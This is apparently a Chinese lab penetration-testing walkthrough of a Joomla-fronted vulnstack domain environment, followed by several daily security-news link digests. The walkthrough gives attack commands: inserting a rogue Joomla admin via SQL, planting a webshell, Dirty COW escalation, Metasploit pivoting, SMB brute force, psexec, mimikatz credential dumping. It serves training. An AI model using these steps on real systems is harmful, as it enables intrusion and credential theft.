环境搭建 将环境从http://vulnstack.qiyuanxuetang.net/vuln/detail/5/上下载下来，只需要添加相应的一个VMNET2的网卡，且IP段为192.168.93.0/24 需要进入centos重启一下网卡，至少我是这么做的才找到IP。 本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=ECID2026-aeda-4f39-89ed-c6444fa2bfa2  （本节课主要讲解Vulnhub渗透测试实战靶场关于Joomla CMS的综合渗透练习，通过该实验学习渗透测试的信息收集、漏洞扫描与利用、权限提升，最终获取/root下的flag。） 拓扑图  WEB入口 主机发现 nmap -sn 192.168.124.0/24  端口 nmap -sS 192.168.124.16  收集到3个端口，暂不做全部扫描。那就先看下网站首页，如下。  web站点 是一个joomla的web页面，顺手一个administrator放在url后面，看到后台，看到后台，看到后台。我还是比较乐观的人，总想去尝试尝试一两个弱口令。现实总会给我一记响亮的耳光，失败告终。  只好掏出dirsearch，然后扫描下目录：  这是以php~结尾的后缀名，应该不会被当成php执行，所以，  这个时候，就可以连接数据库了，那就找密码进后台。  难道还是想我爆破？如果让我爆破，那这必然是个弱口令。先去网上子弹(字典)，掏出大菠萝(john)就是一顿扫。子弹打完了，发现敌人丝毫不动，那，那宣告失败吧。都说失败是成功的爹。接着换思路，就是在本地搭建一个一模一样的。然后将自己mysql里的password字段复制到目标数据库中去或者添加一个新用户，太懒是原罪。然后，在网上找到直接添加到数据库的方法，在https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn  改成目标机器上的表名就可以了： INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW()); INSERT INTO `am2zu_user_usergroup_map` (`user_id`,  虽然密码格式不一样，但是依然能进后台。  在模板处可以修改网站源代码：Extensions-->Templates，在index.php中插入一句话，保存。   该亮出尚方宝剑——蚁剑了，致命一击进入内网了。然后就翻车了  这，，，原来是被禁用了危险函数，虽然不能执行命令，但是能看到php版本，是php7的。然后发现蚁剑有专门的绕过disable_function的插件，姿势不错，有点狐气。然后针对php7的绕过挨个挨个试。  绕过了会弹出一个新的交互式shell界面  内网渗透 权限太低，是个www-data的权限。相信经过一番努力使用各种姿势提权，总会绝望的。那就只能是自己没有做好信息收集，找：定时任务、/home、/etc/passwd、网站根目录、/tmp目录。最后在/tmp/mysql/test.txt中看到用户名密码  但是并没有在本机器上发现这个 wwwuser 的用户。索性尝试下，又不犯罪。  竟然成功了？猜测应该做了转发将http请求转到内网的主机上，有内网就可以继续渗透。  而使用ssh连接的主机的网卡，有三个，一个连接外网，一个连接内网。  然后接着提权这台外网的主机，很顺利，看样子是有备而来。看了下内核为2.6.32 并且是centos的操作系统，直接使用脏牛提权成功。   获取一个msf会话，接着渗透。  后渗透 添加路由 meterpreter > run get_local_subnets meterpreter > run autoroute -s 192.168.93.0/255.255.255.0  探测内网主机的存活 # 针对windows use auxiliary/scanner/smb/smb_version # linux use auxiliary/scanner/discovery/arp_sweep 用这个没有探测出windows主机 最终所有主机如下  三个windows，两个使用ms17-010，未果。都没能得到会话。  啊，这....。最后借鉴了下别人的方法，原来是爆破。字典不够强大，最后还是将密码添加到字典中去了（无可奈何）。假如说我爆破出来了 use auxiliary/scanner/smb/smb_login set SMBUSER administrator set PASS_FILE /root/桌面/passlist  获取会话。目前的情况是windows在内网，添加的路由是把攻击机带入到内网，使用reverse_tcp是连接不上了，只能正向连接。 use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.93.30 set smbuser administrator set smbpass 123qwe!ASD 然后拿到两个会话，这个exploit需要多尝试几次，才行。  查看是否在域环境 meterpreter > sysinfo   sysinfo" src="headImg.action?news=b44d60ec-bd7d-4839-acf1-004953f9a34e.png" width="848" height="99" 拿下域控 在server2008上发现域控登录后的记录，然后使用 mimikatz 获取到明文域控密码。 load mimikatz mimikatz_command -f privilege::debug mimikatz_command -f sekurlsa::logonPasswords  得到域管理员账号密码。由于密码的特殊性，尝试使用wmiexec.py一直没成功，两个!!在linux是特殊符号，表示重新执行上一条命令。然后通过下面方法拿到shell 当前用户为   远程连接 run post/windows/manage/enable_rdp proxychains rdesktop 192.168.93.20

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Nvidia警告Windows游戏玩家注意驱动高危漏洞 https://threatpost.com/nvidia-windows-gamers-graphics-driver-flaws/162857/ 2、新勒索软件Babuk Locker瞄准大公司 https://threatpost.com/ransomware-babuk-locker-large-corporations/162836/ 3、日产北美公司因Git服务器配置错误泄露源代码 https://www.zdnet.com/article/nissan-source-code-leaked-online-after-git-repo-misconfiguration/ 4、红帽收购容器安全公司StackRox https://www.securityweek.com/red-hat-buys-container-security-firm-stackrox 5、安全研究人员发现Ezuri内存加载器在Linux攻击中被利用 https://www.securityweek.com/ezuri-memory-loader-abused-linux-attacks 6、Fortinet WAF中发现严重漏洞可能使公司网络受到攻击 https://www.securityweek.com/vulnerabilities-fortinet-waf-can-expose-corporate-networks-attacks 7、与朝鲜相关的APT37通过RokRat Trojan攻击韩国 https://securityaffairs.co/wordpress/113134/malware/apt37-rokrat-trojan.html 8、美国政府将与HackerOne合作启动“ Hack the Army 3.0”漏洞赏金计划 https://securityaffairs.co/wordpress/113116/security/hack-the-army-3-0.html 9、Mozilla Firefox禁用退格键以防止数据丢失 https://www.bleepingcomputer.com/news/software/mozilla-firefox-disabling-backspace-key-to-prevent-data-loss 10、Chrome 87 更新修复数十个高危漏洞 https://www.securityweek.com/google-pays-out-over-100000-vulnerabilities-patched-chrome-87-update

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Earth Wendigo通过JavaScript后门窃取电子邮件 https://www.securityweek.com/earth-wendigo-hackers-exfiltrate-emails-through-javascript-backdoor 2、新加坡承认警方可以访问Covid-19追踪APP数据 https://www.securityweek.com/singapore-admits-police-can-access-contact-tracing-data 3、SoftMaker Office漏洞允许通过恶意文档执行代码 https://www.securityweek.com/softmaker-office-vulnerabilities-allow-code-execution-malicious-documents 4、安全研究人员发现针对企业网络的全新勒索软件家族Babuk https://www.securityweek.com/researchers-warn-new-ransomware-targeting-enterprise-networks 5、SolarWinds供应链攻击访问了美国司法部3%的邮箱 https://securityaffairs.co/wordpress/113108/data-breach/solarwinds-hackers-o365-mailboxes.html 6、WhatsApp将与Facebook及其公司共享用户数据 https://securityaffairs.co/wordpress/113094/digital-id/whatsapp-shares-data-facebook.html 7、钓鱼邮件使用假的特朗普性丑闻视频传播QNode恶意软件 https://thehackernews.com/2021/01/hackers-using-fake-trumps-scandal-video.html 8、研究人员发现黑客利用严重的Zyxel漏洞攻击 https://threatpost.com/cybercriminals-exploits-zyxel-flaw/162789/ 9、黑客组织Thallium针对股票投资者进行供应链攻击 https://www.bleepingcomputer.com/news/security/north-korean-software-supply-chain-attack-targets-stock-investors/ 10、印度数千名患者的COVID-19实验室测试结果泄漏 https://www.bleepingcomputer.com/news/security/indian-government-sites-leaking-patient-covid-19-test-results/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、美安全机构发表联合声明将SolarWinds供应链攻击归咎于俄罗斯 https://securityaffairs.co/wordpress/113071/hacking/us-blames-russia-solarwinds-hack.html 2、加密货币用户遭ElectroRAT大规模攻击 https://securityaffairs.co/wordpress/113064/malware/electrorat-campaign.html 3、自11月以来针对医疗保健行业的网络攻击增加了45％ https://securityaffairs.co/wordpress/113038/hacking/healthcare-industry-attacks.html 4、数据安全提供商Netwrix和Stealthbits合并 https://www.securityweek.com/data-security-providers-netwrix-and-stealthbits-merge 5、Citrix发布更新，修复被用来发起反射DDoS攻击的缺陷 https://www.securityweek.com/citrix-releases-updates-prevent-ddos-attacks-abusing-its-appliances 6、Zyxel产品存在后门账号影响数十万用户 https://www.securityweek.com/hackers-start-exploiting-recently-disclosed-zyxel-vulnerability 7、Google发布Android安全更新解决了43个漏洞 https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/ 8、Telegram查看附近的人功能可对他人进行三角定位 https://threatpost.com/telegram-triangulation-users-locations/162762/ 9、亚马逊合作伙伴Juspay泄露3500万印度信用卡持有人的数据 https://threatpost.com/data-from-august-breach-of-amazon-partner-juspay-dumped-online/162740/ 10、新恶意软件使用WiFi BSSID进行地理定位 https://www.zdnet.com/article/malware-uses-wifi-bssid-for-victim-identification/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、SolarWinds 供应链攻击已影响多达250家政府和企业 https://www.securityweek.com/over-250-organizations-breached-solarwinds-supply-chain-hack-report 2、Apex实验室称患者数据在勒索软件攻击中被盗 https://www.securityweek.com/apex-laboratory-says-patient-data-stolen-ransomware-attack 3、英国法官拒绝美国引渡维基解密创始人阿桑奇 https://www.securityweek.com/uk-judge-refuses-us-extradition-wikileaks-founder-assange 4、MuddyWater攻击从GitHub下载了PowerShell脚本 https://securityaffairs.co/wordpress/112972/hacking/muddywater-attack-github-imgur.html 5、NCA逮捕了21位WeLeakInfo服务的客户 https://securityaffairs.co/wordpress/112935/cyber-crime/nca-arrested-weleakinfo-customers.html 6、研究人员使用Google语音文本API绕过音频reCAPTCHA https://threatpost.com/researcher-breaks-recaptcha-speech-to-text-api/162734/ 7、T-Mobile报告了数据泄露事件 https://threatpost.com/t-mobile-another-data-breach/162703/ 8、微软未发布的Core Polaris操作系统在线泄漏 https://www.bleepingcomputer.com/news/microsoft/microsofts-unreleased-windows-core-polaris-os-leaks-online/ 9、研究人员在暗网发现100万个游戏公司内部账户 https://www.infosecurity-magazine.com/news/one-million-compromised-accounts/ 10、PayPal短信网络钓鱼活动试图窃取用户凭据 https://www.bleepingcomputer.com/news/security/beware-paypal-phishing-texts-state-your-account-is-limited/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软表示“ SolarWinds”攻击访问了某些内部代码 https://www.securityweek.com/microsoft-says-solarwinds-hackers-viewed-internal-code 2、APT组织StrongPity使用更新的基础设施 https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/ 3、Smart Grid Gallery插件被注入恶意代码 https://blog.sucuri.net/2020/12/seo-spam-links-in-nulled-plugins.html 4、谷歌Chrome浏览器修复防病毒文件锁定错误 https://www.bleepingcomputer.com/news/security/google-chrome-fixes-antivirus-file-locking-bug-on-windows-10/ 5、黑客访问Mednax公司邮件帐户泄露数据 https://www.beckershospitalreview.com/cybersecurity/mednax-email-hack-exposes-info-of-1-2-million-patients-5-details.html 6、Prestera心理健康服务中心通知数据泄露 https://www.herald-dispatch.com/news/prestera-center-notifies-patients-of-data-security-incident/article_8d844ec5-1272-5ea9-9d5e-2706505b8218.html 7、多个Zyxel防火墙VPN产品中发现秘密后门帐户 https://thehackernews.com/2021/01/secret-backdoor-account-found-in.html 8、新的Golang蠕虫将服务器变成挖矿机器 https://www.scmagazine.com/home/security-news/malware/new-golang-worm-turns-windows-and-linux-servers-into-monero-miners/ 9、2020年最大的数据泄露事件TOP10 https://securityaffairs.co/wordpress/112954/data-breach/top-10-data-breaches-2020.html 10、Ticketmaster因网络攻击竞争对手被罚款1000万美元 https://www.securityweek.com/ticketmaster-pay-10-million-fine-over-hacking-charges

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、T-Mobile数据泄露包括电话号码和通话记录等 https://securityaffairs.co/wordpress/112811/data-breach/t-mobile-data-breach-3.html 2、CISA要求美国政府机构更新SolarWinds Orion软件 https://securityaffairs.co/wordpress/112797/hacking/cisa-solarwinds-guidance-update.html 3、美财政部FinCEN警告对COVID-19疫苗研究的勒索软件攻击 https://securityaffairs.co/wordpress/112783/security/ransomware-covid-19-vaccine-research.html 4、恶意行为者劫持用户的智能设备进行网络直播 https://threatpost.com/fbi-warn-home-security-devices-swatting/162678/ 5、Wasabi云存储服务因托管恶意软件而服务中断 https://www.bleepingcomputer.com/news/security/wasabi-cloud-storage-service-knocked-offline-for-hosting-malware/ 6、Voyager加密货币经纪平台遭网络攻击暂停交易 https://www.bleepingcomputer.com/news/security/voyager-cryptocurrency-broker-halted-trading-due-to-cyberattack/ 7、GenRx Pharmacy遭勒索软件攻击导致HIPAA数据泄露 https://portswigger.net/daily-swig/genrx-pharmacy-ransomware-attack-leads-to-hipaa-data-breach-disclosure 8、安特卫普通用医学实验室遭勒索软件攻击 https://www.brusselstimes.com/news/belgium-all-news/147433/antwerp-laboratory-becomes-latest-victim-of-cyber-attack 9、索引服务和文件共享网站NZBGeek遭攻击整个数据库被窃取 https://www.hackread.com/usenet-indexer-nzbgeek-hacked-database-stolen/ 10、金银谷社区学院通知用户数据泄露 https://www.prnewswire.com/news-releases/treasure-valley-community-college-notifies-consumers-of-data-security-incident-301199086.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、SolarWinds攻击者目标是受害者的云资产 https://securityaffairs.co/wordpress/112773/hacking/solarwinds-solorigate-attack-chain.html 2、日本川崎重工披露安全漏洞和数据泄露 https://securityaffairs.co/wordpress/112765/data-breach/kawasaki-heavy-industries-cyber-attack.html 3、CISA发布工具检测Azure，Microsoft 365中的恶意活动 https://securityaffairs.co/wordpress/112751/security/cisa-azure-microsoft-365-detection-tool.html 4、芬兰确认黑客入侵国会议员的电子邮件帐户 https://securityaffairs.co/wordpress/112731/cyber-warfare-2/finland-security-breach.html 5、Google文档修复了可允许黑客查看你私人文档的漏洞 https://thehackernews.com/2020/12/a-google-docs-bug-could-have-allowed.html 6、针对COVID-19 IP(知识产权)的盗窃攻击激增 https://threatpost.com/hackers-amp-up-covid-19-ip-theft-attacks/162634/ 7、基于AutoHotkey（AHK）的密码窃取攻击针对美国和加拿大银行用户 https://thehackernews.com/2020/12/autohotkey-based-password-stealer.html 8、Neopets虚拟宠物网站泄露了大量敏感数据 https://securityledger.com/2020/12/neopets-is-still-a-thing-and-its-exposing-sensitive-data/ 9、英国NCA访问WeLeakInfo用户，警告他们使用被盗数据 https://www.bleepingcomputer.com/news/security/uk-nca-visits-weleakinfo-users-to-warn-of-using-stolen-data/ 10、Zix收购云备份和恢复提供商CloudAlly以保护SaaS数据 https://searchdatabackup.techtarget.com/news/252494141/Zix-acquires-CloudAlly-backup-for-SaaS-data-protection

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、意大利移动服务提供商Ho mobile的数据库在地下论坛出售 https://securityaffairs.co/wordpress/112740/data-breach/ho-mobile-data-leak.html 2、美国家电制造商Whirlpool受Nefilim勒索软件攻击并泄露数据 https://securityaffairs.co/wordpress/112722/cyber-crime/whirlpool-nefilim-ransomware.html 3、欧洲电商21 Buttons泄露了数百万用户的数据 https://securityaffairs.co/wordpress/112701/data-breach/button-21-data-leak.html 4、一个新的SolarWinds漏洞可被执行远程攻击 https://thehackernews.com/2020/12/a-new-solarwinds-flaw-likely-had-let.html 5、网络钓鱼活动窃取超过61.5万Facebook用户凭据 https://threatnix.io/blog/large-scale-phishing-campaign-affecting-615000-users-worldwide/ 6、钓鱼邮件冒充美国邮政服务窃取用户信用卡凭据 https://abnormalsecurity.com/blog/usps-credential-phishing/ 7、研究人员发现新恶意软件与MuddyWater小组有关 https://www.bleepingcomputer.com/news/security/github-hosted-malware-calculates-cobalt-strike-payload-from-imgur-pic/ 8、多平台支付卡窃取器针对针对Shopify，BigCommerce等多个商店 https://securityaffairs.co/wordpress/112713/hacking/multi-platform-card-skimmer.html 9、HelpSystems收购了数据保护公司Vera https://www.securityweek.com/helpsystems-acquires-data-protection-firm-vera 10、苏格兰环境保护局遭到网络攻击 https://news.stv.tv/scotland/scottish-environment-protection-agency-targeted-in-cyberattack

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、SolarWinds发布有关SUPERNOVA后门的公告 https://securityaffairs.co/wordpress/112668/security/solarwinds-supernova-malware-advisory.html 2、HackerOne宣布第一个获得超200万美元赏金的白帽子 https://securityaffairs.co/wordpress/112678/hacking/hackerone-bug-bounty-hunter-2m.html 3、佛蒙特州医院证实了遭勒索软件攻击 https://securityaffairs.co/wordpress/112694/malware/vermont-hospital-ransomware-attack.html 4、CrowdStrike发布免费的Azure安全工具 https://securityaffairs.co/wordpress/112628/security/crowdstrike-azure-tool.html 5、The Hospital Group遭到REvil勒索软件攻击 https://securityaffairs.co/wordpress/112637/cyber-crime/the-hospital-group-revil.html 6、日本游戏开发商Koei Tecmo遭黑客入侵数据泄露 https://www.bleepingcomputer.com/news/security/koei-tecmo-discloses-data-breach-after-hacker-leaks-stolen-data/ 7、研究人员发现新的恶意活动滥用Chrome扩展 https://www.kaspersky.com/blog/chrome-plugins-alert/38242/ 8、Citrix确认DDoS攻击针对ADC网络设备 https://securityaffairs.co/wordpress/112597/hacking/citrix-ddos.html 9、基于VBA的攻击技术越来越多被利用 https://cyware.com/news/attackers-increasingly-adopting-vba-based-attack-techniques-b0ba9e55 10、僵尸网络Gitpaste-12增加了新功能 https://cyware.com/news/gitpaste-12-adds-new-features-to-its-arsenal-b4c23625